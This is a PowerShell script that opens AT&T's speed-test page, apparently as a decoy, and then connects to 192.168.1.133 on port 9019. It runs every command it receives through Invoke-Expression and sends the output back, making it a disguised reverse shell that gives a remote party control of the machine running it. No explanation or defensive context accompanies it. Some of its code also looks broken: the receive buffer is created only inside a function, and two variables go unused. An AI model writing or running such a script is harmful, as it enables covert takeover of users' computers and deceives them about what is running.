start "https://www.att.com/support/speedtest/"
$f = [System.Text.Encoding]::UTF8
$g = '192.168.1.133'
$h = 9019
$i = New-Object Net.Sockets.TCPClient($g, $h)
$j = $i.GetStream()
$k = New-Object IO.StreamWriter($j)
$l = { $args += 'SHELL> ' }
$m = { $f.GetString($args, 0, $args.Length) }
function wTS($n) {
  $o = New-Object byte[] $i.ReceiveBufferSize
  $k.Write($n + 'SHELL> ')
  $k.Flush()
}
wTS ''
while (($p = $j.Read($o, 0, $o.Length)) -gt 0) {
  $q = $f.GetString($o, 0, $p)
  try {
    $r = Invoke-Expression $q 2>&1 | Out-String
  } catch {
    $r = $_ | Out-String
  }
  wTS $r
}
$k.Close()
